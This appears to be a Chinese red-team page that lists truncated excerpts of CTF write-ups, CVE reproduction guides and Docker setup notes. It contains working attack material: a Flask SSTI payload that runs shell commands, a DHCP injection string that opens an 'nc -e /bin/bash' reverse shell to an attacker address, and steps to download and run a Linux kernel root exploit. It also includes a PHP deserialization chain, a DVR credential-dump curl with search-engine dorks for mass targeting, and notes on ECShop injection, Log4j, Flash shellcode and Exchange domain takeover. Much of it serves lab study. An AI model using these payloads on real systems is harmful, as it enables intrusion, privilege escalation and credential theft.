红队攻击面相关讨论

一、base16解密题目名称：base64÷4题目附件：https://adworld.xctf.org.cn/media/task/attachments/c8cb2b557b57475d8ec1ed36e819ac4d.txt题目writeup: 1.根据题目名称，猜测是base162.通过在线base16解密可获得：https://www.qqxiuzi.cn/bianma/base.php?type=163.解密脚本：import base64 s='666C61677B45333342374644384133423834314341393639394544444241323442363041417D' flag=base64.b16decode(s) print flag4.最终获得flag:flag{E33B7FD8A3B841CA9699EDDBA24B60AA}二、modbus工业协议流量包分析题目名称：神奇的Modbus题目描述：寻找flag,提交格式为sctf{xxx}附件内容：https://adworld.xctf.org.cn/media/task/attachments/22fc3d84e8434aed89cbc0bbd95a07b4.pcapng 基础知识：Modbus是一种串行通信协议，是Modicon公司（现在的施耐德电气 Schneider Electric）于1979年为使用可编程逻辑控制器（PLC）通信而发表。Modbus已经成为工业领域通信协议的业界标准（De facto），并且现在是工业电子设备…

一、查找备份文件1.通过https://github.com/maurosoria/dirsearch进行目录扫描python3 dirsearch.py -u http://10.10.10.175:32770 -e *2.最终获得index.php.bk备份文件，然后下载下来查看源码，即可获得flagflag为：Cyberpeace{855A1C4B3401294CB6604CCC98BDE334} 二、隐藏在cookie中的flag1.通过抓包工具对IP访问进行抓取http头部信息，发现cookie中包含信息：Cookie: look-here=cookie.php2.然后访问网址：http://220.249.52.133:41440/cookie.php,显示文字提示See the http response，说明flag有可能在响应包中3.对网址http://220.249.52.133:41440/cookie.php,进行请求，查看响应包，可看到flag信息4.最终flag为：cyberpeace{71de0ba3c98781d7f78c4af6e5b684be} 三、隐藏在按钮下的flag1.打开网址，http://220.249.52.133:52359/，发现按钮灰色，提示不能使用，这时候通过f12进行元素审核2.删除 disabled="" ，然后点击按钮即可获得flag3.最终flag为：cyberpeace{e61ed8f7f37f036a89f6d3c5622bb8e9}四、弱密码获得flag1.…

题目名称：Simple_SSTI_2题目wirteup:启动题目场景，获得靶场网站，访问网站，页面显示url连接需要连接一个 flag参数http://114.67.246.176:19131/根据题目内容，该题是一个ssti漏洞，这里构造ssti，参数构造flag={{3+2}}，报错，且是flaskhttp://114.67.246.176:19131/?flag={{3+2}} 又尝试构造flag={{3*2}},发现页面显示6.证明系统存在ssti漏洞http://114.67.246.176:19131/?flag={{3*2}}通过config变量查看flask的配置信息，并没有可利用点http://114.67.246.176:19131/?flag={{config}} 通过{{ config.__class__.__init__.__globals__['os'].popen('ls ../').read() }}读取系统文件，这里读取网站系统目录，发现存在一些文件夹，一个个进入查看，发现第一个看的app文件夹里就有flag##__class__：用来查看变量所属的类，根据前面的变量形式可以得到其所属的类。##__init__ 初始化类，返回的类型是function##__globals__[] 使用方式是 函数名.__globals__获取function所处空间下可使用的module、方法以及所有变量。##os.popen() 方法用于从一个命令打开一个管道。##open(…

题目名称：从0到1CTFer成长之路-Web文件上传题目wirteup:启动题目场景，获得题目靶场，访问网站，发现是一个文件上传漏洞，并且源代码也显示出来。http://eci-2zead4wngyl8hacgmm4n.cloudeci1.ichunqiu.com/ 源代码大概如下分析：<?phpheader("Content-Type:text/html; charset=utf-8");// 每5分钟会清除一次目录下上传的文件 //会包含文件pclzip.lib.php，感觉这个php里面是有一些针对zip包进行解压等的操作的require_once('pclzip.lib.php'); //要是没上传文件，就输出上传页面if(!$_FILES){echo '省略的HTML' show_source(__FILE__);}else{ $file = $_FILES['file']; //限制上传的文件名不为空 if(!$file){ exit("请勿上传空文件"); } $name = $file['name']; $dir = 'upload/';//strrchr($name, '.') //strrchr() 函数查找字符串在另一个字符串中最后一次出现的位置，并返回从该位置到字符串结尾的所有字符。//比如上传的文件名为$name=1.php.txt，这里strrchr($name, '.') 执行结果为.txt//substr(strrchr($name, '.'), 1…

0x01 前言 该漏洞由Google project zero发现。据悉，该漏洞存在于带有 eBPF bpf(2)系统（CONFIG_BPF_SYSCALL）编译支持的Linux内核中，是一个内存任意读写漏洞。该漏洞是由于eBPF验证模块的计算错误产生的。普通用户可以构造特殊的BPF来触发该漏洞，此外恶意攻击者也可以使用该漏洞来进行本地提权操作。 0x02漏洞影响 Linux Kernel Version 4.14-4.4(影响Debian和Ubuntu发行版) 0x03 测试环境 ubuntu16.04 x64 0x04 测试步骤 1.提权exp下载地址： http://cyseclabs.com/exploits/upstream44.c 2.cd切换到/opt目录下并下载exp： cd /opt #前提看/opt是不是777权限，不然编译和执行不了exp wget http://cyseclabs.com/exploits/upstream44.c 3.有的ubuntu没有安装gcc需要执行安装： sudo apt-get install gcc 如果缺少一些编译组件，则需要安装lib插件 apt-get install libc6-dev 4.然后利用gcc进行编译 gcc -o exp upstream44.c 5.将exp进行更改为可执行权限 chmod +x exp 6.运行exp进行提权 ./exp 0x05 漏洞修复 目前暂未有明确的补丁升级方案。 临时…

前言 2017年6月13日，微软官方发布编号为CVE-2017-8464的漏洞公告，官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞，黑客可以通过U盘、网络共享等途径触发漏洞，完全控制用户系统，安全风险高危 漏洞描述 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器（或远程共享）时，恶意二进制程序将在目标系统上执行攻击者选择的代码，成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 漏洞利用条件和方式: 远程利用 漏洞影响范围: Microsoft Windows 10 Version 1607 for 32-bit Systems Microsoft Windows 10 Version 1607 for x64-based Systems Microsoft Windows 10 for 32-bit Systems Microsoft Windows 10 for x64-based Systems Microsoft Windows 10 version 1511 for 32-bit Systems Microsoft Windows 10 version 1511 for x64-based Systems Microsoft Windows 10 version 1703 …

0x01 漏洞概述 近日，红帽官方发布了安全更新，修复了编号为CVE-2018-1111的远程代码执行漏洞，攻击者可以通过伪造DHCP服务器发送响应包，攻击红帽系统，获取root权限并执行任意命令。 0x02 影响版本 Red Hat Enterprise Linux Server 6 Red Hat Enterprise Linux Server 7 CentOS 6 CentOS 7 0x03 漏洞详情 DHCP 是一个局域网的网络协议，主要用于内部网络动态IP地址分配。Red Hat提供的DHCP客户端软件包dhclient的脚本为/etc/NetworkManager/dispatcher.d/11-dhclient（Red Hat Enterprise Linux 7）和/etc/NetworkManager/dispatcher.d/10-dhclient（Red Hat Enterprise Linux 6）；当NetworkManager组件从DHCP服务器收到DHCP响应时执行该脚本。 使用单引号使参数值逃逸成功，导致了命令执行 --dhcp-option="252,x'&nc -e /bin/bash 10.1.1.1 1337 #" 0x04 漏洞复现 复现时需要注意的点： 1.两台虚拟机的网络适配器都需要设置为 仅主机模式 2.停用主机模式的DHCP服务LS8 z( D/ M0 ~& J2 f9 l 环境 攻击机：kali 2018.2 受害机：centos7 去…

0x01 前言在getST.py（https://github.com/SecureAuthCorp/impacket/blob/master/examples/）中添加了一个新的PR-force-forwardable标识。启用该标识后，程序将执行以下步骤（新添加的内容以粗体显示）： 程序将使用通过-hash或-aesKey参数提供的密钥，获得一个TGT作为命令行指定的服务主体程序将通过其TGT执行S4U2self交换，以获得通过-impersonate参数指定的用户的服务主体的服务票据程序将使用步骤1中使用的服务主体的相同密钥来解密服务票据程序将编辑服务票据，将“ forwardable”标识设置为1。程序将使用服务主体的密钥重新加密编辑后的服务票据。程序将与服务票证及其TGT进行S4U2proxy交换，以获得作为通过-spn参数指定的服务的模拟用户的服务票据该程序将输出结果作为服务票据，该服务票据可用于对目标服务进行身份验证并模拟目标用户。通过编辑票据并将其forwardable bit 强制设置为1，该程序可以模拟作为“受保护的用户”组成员或使用“帐户敏感且无法委派（Account is sensitive and cannot be delegated"）”设置配置的用户。这也允许该程序与为“仅Kerberos”约束委派配置的服务一起使用。在下面的示例中，“Service1”允许对“Service2”执行约束委派，而User2被配置为“账号敏感且无法委派（sensitive and cannot delegat）”。如果没有…

一、漏洞描述 Apache Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器.默认情况下,Apache Tomcat会开启AJP连接器,方便与其他Web服务器通过AJP协议进行交互.但Apache Tomcat在AJP协议的实现上存在漏洞,导致攻击者可以通过发送恶意的AJP请求,可以读取或者包含Web应用根目录下的任意文件,如果配合文件上传任意格式文件，将可能导致任意代码执行(RCE).该漏洞利用AJP服务端口实现攻击,未开启AJP服务对外不受漏洞影响（tomcat默认将AJP服务开启并绑定至0.0.0.0/0）. 二、危险等级 高危 三、漏洞危害 攻击者可以读取 Tomcat所有 webapp目录下的任意文件。此外如果网站应用提供文件上传的功能，攻击者可以先向服务端上传一个内容含有恶意 JSP 脚本代码的文件（上传的文件本身可以是任意类型的文件，比如图片、纯文本文件等），然后利用 Ghostcat 漏洞进行文件包含，从而达到代码执行的危害 四、影响范围 Apache Tomcat 9.x < 9.0.31 Apache Tomcat 8.x < 8.5.51 Apache Tomcat 7.x < 7.0.100 Apache Tomcat 6.x 五、前提条件 对于处在漏洞影响版本范围内的 Tomcat 而言，若其开启 AJP Connector 且攻击者能够访问 AJP Connector 服务端口的情况下，即存在被 Ghostcat 漏洞利用的风险。注意 Tomc…

0x00 漏洞描述Apache Log4j 是 Apache 的一个开源项目，Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架，并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等，通过定义每一条日志信息的级别，能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发，用来记录日志信息。 Log4j-2中存在JNDI注入漏洞，当程序将用户输入的数据被日志记录时，即可触发此漏洞，成功利用此漏洞可以在目标服务器上执行任意代码。鉴于此漏洞危害较大，建议客户尽快采取措施防护此漏洞 0x01 影响范围Apache Log4j 2.x < 2.15.0-rc2 已知受影响组件 1、Apache Struts2 2、Apache Solr 3、Apache Flink 4、Apache Druid 5、ElasticSearch 6、flume 7、dubbo 8、Redis 9、logstash 10、kafka 11.vmvare12.Spring-Boot-strater-log4j20x02 环境搭建一、linux环境搭建linxu环境下目前 Vulfocus 已经集成 Log4j2，可通过以下链接启动在线环境测试： http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c 也可通过 docker pull vulfocus/log4j2-rce-…

0x01 漏洞简介 Dolibarr ERP & CRM <=15.0.3 is vulnerable to Eval injection. By default, any administrator can be added to the installation page of dolibarr, and if successfully added, malicious code can be inserted into the database and then execute it by eval. CVE编号：CVE-2022-2633 漏洞描述：Dolibarr edit.php 存在远程命令执行漏洞，攻击者通过逻辑漏洞创建管理员后可以通过后台漏洞获取服务器权限 影响版本：<= 15.0.3 0x02 漏洞分析 1.环境搭建 源码下载地址：https://github.com/Dolibarr/dolibarr/archive/refs/tags/15.0.3.zip 解压到web目录下直接访问~/htdocs/即可 然后配置一下conf/conf.php即可进行安装 2.任意管理员用户注册 这其实算是个逻辑漏洞，在install系统以后，他不会进行锁定，而是需要用户在documents目录中手动添加，所以我们随时可以进入这里去添加管理员账号：~/install/step4.php 比如这里我添加一个aaa用户 可以成功进入后台的 3.后台RCE 后台RCE的最后点在ht…

WEB题目：Sanic's revenge解题步骤 首先看到给出的附件: from sanic import Sanic import os from sanic.response import text, html import sys import random import pydash # pydash==5.1.2 # 这里的源码好像被admin删掉了一些，听他说里面藏有大秘密 class Pollute: def __init__(self): pass app = Sanic(__name__) app.static("/static/", "./static/") @app.route("/*****secret********") async def secret(request): secret='**************************' return text("can you find my route name ???"+secret) @app.route('/', methods=['GET', 'POST']) async def index(request): return html(open('static/index.html').read()) @app.route("/pollute", methods=['GET', 'POST']) async def POLLUTE(request): key = re…

EasyPOP题目环境是 php 7.4, 图省事直接把所有属性的类型都改成 public 起点是 sorry 类的 __destruct(), 由 echo $this->hint 调用到 show 类的 __toString() 方法, 然后通过执行 $this->ctf->show() 跳转 secret_code 类的 __call() , 进而到 show() 方法, 在 show() 方法中访问不存在的属性, 跳转到 sorry 类的 __get(), 最后通过 $name() 跳到 fine 类的 __invoke() pop 链构造如下 <?php class fine { public $cmd; public $content; } class show { public $ctf; public $time; } class sorry { public $name; public $password; public $hint; public $key; } class secret_code { public $code; } $e = new fine(); $e->cmd = 'system'; $e->content = 'cat /flag'; $d = new sorry(); $d->key = $e; $c = new secret_code(); $c->code…

前言 Dev C++也是一个编程工具,配置也简单,且便捷-麻雀虽小,五脏俱全,可谓是编程必备了这边Godyu建议呢 Vscode和Devc++都下载并且使用 熟悉一下 （比赛的时候Dev c++频率出现较大） 本文章由Godyu编写,PDF图片以及操作过程由Frex提供！ 原创配置教程不懂的可以问我（为爱发电我第一个冲 下载、安装DEV-C++并进行简单设置 1.进入DEV-C++库官网，点击”DownLoad”按钮，之后会进入第二个界面，等待倒计时结束，会自动开始下载。 如果下载速度过慢或者无法进入该网页,请点击此处下载https://frexcheat.lanzoul.com/i4b2P1brn3ri 密码:h5v6 2.下载完成后，我们双击打开安装包，等待加载完毕，选择合适的安装路径，按照下面图示安装即可。 3.之后我们运行DEV-C++，会出现以下界面，在第一个界面我们选择”简体中文”，然后点击”Next”，之后会让我们 选择代码字体以及代码编辑框的主题，这里字体推荐”Cascadia Code SemiBold”，主题推荐”GSS Hacker”，之后 点击”Next”，再点击”OK”，那么我们的DEV-C++基本就设置完成了。 2.使用DEV-C++创建一个新项目并运行 1.打开DEV-C++，在左上角点击”文件-新建源代码 若如果点击运行（点击编译运行就可以直接…

0x01 前言 MERCY是一个致力于PWK课程安全的靶机系统。MERCY是一款游戏名称，与易受攻击的靶机名称无关。本次实验是攻击目标靶机获取root权限并读系统目录中的proof.txt信息 靶机的下载地址： https://drive.google.com/uc?id=1YzsW1lCKjo_WEr6Pk511DXQBFyMMR14y&export=download（注意确认下载镜像中MERCY.mf的sha256值是否正确） 0x02 信息收集 1.存活主机扫描 root@kali2018:~#arp-scan -l 发现192.168.1.12就是目标靶机系统 2.端口扫描 通过NAMP对目标靶机进行端口扫描 root@kali2018:~# nmap -A192.168.1.12 Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-12 09:55 EST Nmap scan report for 192.168.1.12 Host is up (0.00091s latency). Not shown: 990 closed ports PORT STATESERVICE VERSION 22/tcp filtered ssh 53/tcp opendomain ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux) | dns-nsid: |_ bind.v…

一、dll的定义 DLL(Dynamic Link Library)文件为动态链接库文件，又称“应用程序拓展”，是软件文件类型。在Windows中，许多应用程序并不是一个完整的可执行文件，它们被分割成一些相对独立的动态链接库，即DLL文件，放置于系统中。当我们执行某一个程序时，相应的DLL文件就会被调用。一个应用程序可使用多个DLL文件，一个DLL文件也可能被不同的应用程序使用，这样的DLL文件被称为共享DLL文件。 如果在进程尝试加载一个DLL时没有指定DLL的绝对路径，那么Windows会尝试去按照顺序搜索这些特定目录时下查找这个DLL,只要黑客能够将恶意的DLL放在优先于正常DLL所在的目录，就能够欺骗系统优先加载恶意DLL，来实现“劫持” 二、dll的原理利用 2.1 Windows XP SP2之前 Windows查找DLL的目录以及对应的顺序： 1. 进程对应的应用程序所在目录； 2. 当前目录（Current Directory）； 3. 系统目录（通过 GetSystemDirectory 获取）； 4. 16位系统目录； 5. Windows目录（通过 GetWindowsDirectory 获取）； 6. PATH环境变量中的各个目录； 例如：对于文件系统,如doc文档打开会被应用程序office打开，而office运行的时候会加载系统的一个dll文件，如果我们将用恶意的dll来替换系统的dll文件，就是将DLL和doc文档放在一起，运行的时候就会在当前目录中找到DLL，从而优先系统目录下的DLL而被…

这篇文章主要介绍了docker pull拉取超时的解决方案，具有很好的参考价值，希望对大家有所帮助。一起跟随小编过来看看吧 最近docker pull镜像的时候非常不稳定，速度慢不说还经常超时失败 Pulling xlxdsj_swagger_ui (swaggerapi/swagger-ui:)... latest: Pulling from swaggerapi/swagger-ui ba3557a56b15: Pull complete 1a18b9f93d41: Pull complete 38ceab6c6432: Pull complete 6104f3bd82cc: Pull complete 750e0e12d70c: Pull complete d7c38a871210: Pull complete cbd9bbb7c3b7: Pull complete 3d6723371070: Pull complete 5e5b2de4487f: Pull complete 3c84c9c2d567: Pull complete 9e7d57b00bb8: Pull complete 5356d2f5be08: Pull complete Digest: sha256:2a746f15dacc2f2e381b3449544b82e6c7604567f05606d957ff5b7cf7d29a47 Status: Downloaded newer image for swaggerapi/swagger-ui:lates…

勤加练习,记住 本文参考:大佬的文章 Docker 项目的目标是实现轻量级的操作系统虚拟化解决方案，使用Docker，开发和测试可以快速部署和迁移环境，并且能保证环境的一致性，从而提升软件的开发和维护效率。 与虚拟机相比，docker有优点也有缺点，具体可以看下图： 特性容器虚拟机启动秒级分钟级硬盘使用一般为MB一般为GB性能接近原生弱于系统支持量单片机支持上千个容器一般是几个 docker安装 linux换源 https://blog.csdn.net/qq_40520596/article/details/110194439 自动安装: curl -sSL https://get.daocloud.io/docker | sh 手动安装: 1.删除旧版本 yum remove docker \ docker-client \ docker-client-latest \ docker-common \ docker-latest \ docker-latest-logrotate \ docker-logrotate \ docker-selinux \ docker…

docker的定义： Docker 是一个开源的应用容器引擎，让开发者可以打包他们的应用以及依赖包到一个可移植的容器中，然后发布到任何流行的 Linux 机器上，也可以实现虚拟化。容器是完全使用沙箱机制，相互之间不会有任何接口，它采用c/s架构。 docker组件: 1)镜像（image）：docker的镜像其实就是模板，跟我们常见的ISO镜像类似，是一个样板。 2)容器（Container）：使用镜像常见的应用或者系统，我们称之为一个容器。 3)仓库（repsitory）：仓库是存放镜像的地方，分为公开仓库（Public）和私有仓库（Private）两种形式。 docker环境安装： ubuntu16.04系统，需要运行在64为系统上，并且要求内核版本不低于 3.10 uname -a #查看系统内核 docker安装的步骤： 1. root passwd #设置root账号的密码 2. su root #切换到root账号 3. apt-get update #更新系统 docker自动安装： 安装docker方法一： apt-get install -y docker.io 安装docker方法二：（脚本） curl -sSL https://get.docker.com/ | sh 或者国内的阿里云镜像脚本安装： curl -sSL http://acs-public-mirror.oss-cn-hangzhou.aliyuncs.com/docker-engine…

###漏洞描述 此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板，返回此设备的明文管理员凭证。 ###漏洞利用 1.利用代码 curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" 2.poc利用 https://github.com/ezelf/CVE-2018-9995_dvr_credentials git clone https://github.com/ezelf/CVE-2018-9995_dvr_credentials.git cd CVE-2018-9995_dvr_credentials pip install -r requirements.txt ###关键词搜索 1. zoomeye: keyword: “/login.rsp" 2.shodan: keyword:html:"/login.rsp" keyword:"server:GNU rsp/1.0" 3.google: keyword:intitle:"DVR login" ###批量验证 DVR系列摄像头批量检测 使用方法:python CVE-2018-9995_check.py host.txt 其中host.txt内容可以为8.8.8.8:8080或者www.baidu.com，脚…

0x00 前言 问题发生在user.php的的显示函数，模版变量可控，导致注入，配合注入可达到远程代码执行 0x01 漏洞分析 1.SQL注入 先看user.php的$ back_act变量来源于HTTP_REFERER，我们可控。 分配函数用于在模版变量里赋值 再看显示函数, 读取user_passport.dwt模版文件内容，显示解析变量后的HTML内容，用_echash做分割，得到$ķ然后交给isnert_mod处理，由于_echash是默认的，不是随机生成的，所以$ VAL内容可随意控制。 再看insert_mod函数, 非常关键的一个地方，这里进行了动态调用$ VAL传入进来用|分割，参数传入进来时需要被序列化 再看包括/ lib_insert.php中的insert_ads函数, 可以看到这里直接就能注入了 2.代码执行 继续看取函数 追踪_eval函数 $ position_style变量来源于数据库中的查询结构 然后我们继续构造SQL注入，因为这段sql操作命令由部分换行了截断不了所以需要在id处构造注释来配合num进行union。 函数中有一个判断 我们id传入'/ * num传入* / union选择1,0x272f2a，3,4,5,6,7,8,9,10- - 就能绕过了，其poc: SELECT a.ad_id, a.position_id, a.media_type, a.ad_link, a.ad_code, a.ad_name, p.a…

0x00 前言 这是我们2018年Top 5趣案系列中的第三个案例。这些漏洞都有一些因素使它们从今年发布的大约1，400个报告中脱颖而出。今天我们将分析一个Exchange漏洞，它允许任何经过身份验证的用户冒充Exchange Server上的其他用户。 在ZDI的Dustin Childs 12月的文章 中，他提到了一个Exchange漏洞，允许Exchange服务器上的任何用户冒充该Exchange服务器上的任何人。虽然这个漏洞可以用于一些内网的劫持，但这个漏洞更有可能被用于钓鱼活动、窃取数据或其他恶意软件操作。作为2018年Top 5趣案系列的一部分，本文深入研究了这个SSRF(服务器端请求伪造)漏洞的细节，并展示了冒充过程是如何实现的。 0x01 漏洞分析 该漏洞是由SSRF漏洞和其他漏洞相结合造成的。Exchange允许任何用户为推送订阅指定所需的URL，服务器将尝试向这个URL发送通知。问题出在Exchange服务器使用CredentialCache.DefaultCredentials进行连接： 在Exchange Web服务中，CredentialCache.DefaultCredentials在NT AUTHORITYSYSTEM上运行。这将导致Exchange Server向攻击者的服务器发送NTLM散列。Exchange服务器还默认设置了以下注册表项：HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlLsaDisableLoopbackCheck = 1 这允…

在进行渗透过程中，Exchange邮件服务器通常是我们重点关注的对象，因为拿下了Exchange邮件服务器，凭借其机器账户的权限，我们可以赋予其他域内用户dcsync的权限，进而导出域内hash，拿下整个域。 exchange系统的中配置powershell使用命令 https://learn.microsoft.com/zh-cn/powershell/module/exchange/add-mailboxfolderpermission?view=exchange-ps 扫描服务setspn.exesetspn.exe -T vvvv1.com -F -Q */* | findstr exchange nmapnmap 192.168.52.139 -A 探测版本与漏洞通过ews接口获得exchange精确版本信息 缺点：部分旧的exchange版本不支持该操作。 通过owa接口获取exchange粗略版本信息 获得版本号后，可以去官网查询对应的Exchange版本和发布日期。 查询地址： https://learn.microsoft.com/en-us/exchange/new-features/build-numbers-and-release-dates?view=exchserver-2016 使用脚本检测版本与漏洞 https://github.com/3gstudent/Homework-of-Python/blob/master/Exchange_GetVersion_MatchVul.py 爆破pytho…

fastJson全版本Docker漏洞环境(涵盖1.2.47/1.2.68/1.2.80等版本)，主要包括JNDI注入、waf绕过、文件读写、反序列化、利用链探测绕过、不出网利用等。设定场景为黑盒测试，从黑盒的角度覆盖FastJson深入利用全过程，部分环境需要给到jar包反编译分析。 Docker环境 docker compose up -d 若docker拉取环境缓慢，请尝试使用国内镜像 https://www.runoob.com/docker/docker-mirror-acceleration.html 环境启动后，访问对应ip的80端口： 总结了一些关于FastJson全版本常用漏洞利用Poc,可搭配食用：Fastjson全版本检测及利用-Poc 环境使用后请销毁,否则可能会冲突：docker compose down 整理一下靶场顺序：(根据利用特点分成三个大类) FastJson 1.2.471247-jndi 1247-jndi-waf 1247-waf-c3p0 1245-jdk8u342 FastJson 1.2.681268-readfile 1268-jkd11-writefile 1268-jdk8-writefile 1268-writefile-jsp 1268-writefile-no-network 1268-jdbc 1268写文件利用另外写了一篇，可搭配使用：FastJson1268写文件RCE探究 FastJson 1.2.801280-groovy 1283-serialize 每个机器根目…

0x01 前言 Adobe公司在当地时间2018年2月1日发布了一条安全公告： https://helpx.adobe.com/security/products/flash-player/apsa18-01.html 公告称一个新的Flash 0Day漏洞（CVE-2018-4878）已经存在野外利用，可针对Windows用户发起定向攻击。攻击者可以诱导用户打开包含恶意 Flash 代码文件的 Microsoft Office 文档、网页、垃圾电子邮件等。 0x02 漏洞影响 Flash Player当前最新版本28.0.0.137以及之前的所有版本 0x03 漏洞复现 环境测试： 攻击机：kali 目标靶机：win7x64 +IE8.0+FLASH player28.0.0.137 1.下载cve-2018-4878的脚步利用 wget https://raw.githubusercontent.com/backlion/demo/master/CVE-2018-4878.rar 2.解压压缩文件后，可看到cve-2018-4878.py和exploit.swf 3.我们需要对cve-2018-4878.py进行修改，原作者将代码中的stageless变量改成了true，正确的应该改成：stageless = False。附上原作者的exp地址：https://github.com/anbai-inc/CVE-2018-4878.git 4.其次需要修改替换原来弹计算器的shellcode …